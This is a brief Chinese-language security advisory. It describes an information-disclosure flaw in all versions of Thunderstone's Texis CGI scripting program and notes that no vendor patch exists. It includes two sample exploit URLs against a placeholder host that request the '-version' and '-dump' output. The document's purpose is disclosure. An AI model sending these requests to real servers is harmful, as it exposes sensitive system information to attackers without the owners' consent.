涉及程序: Texis 所有版本 描述: Texis 存在信息泄露缺陷 详细: Thunderstone公司的Texis程序是一款功能强大的WEB服务器端HTML程序设计语言,能利用命令行或WEB服务器的CGI程序调用Texis程序以运行脚本。Texis程序存在缺陷,攻击者通过向目标机器发送精心构造的下列格式的临时URL,将获得系统的敏感信息: http://victim.com/texis.exe/?-version http://victim.com/texis.exe/?-dump 攻击方法: 示例代码: http://victim.com/texis.exe/?-version http://victim.com/texis.exe/?-dump 解决方案: 目前厂商未公布该缺陷补丁,请用户及时关注厂商站点: http://www.thunderstone.com/texis/site/pages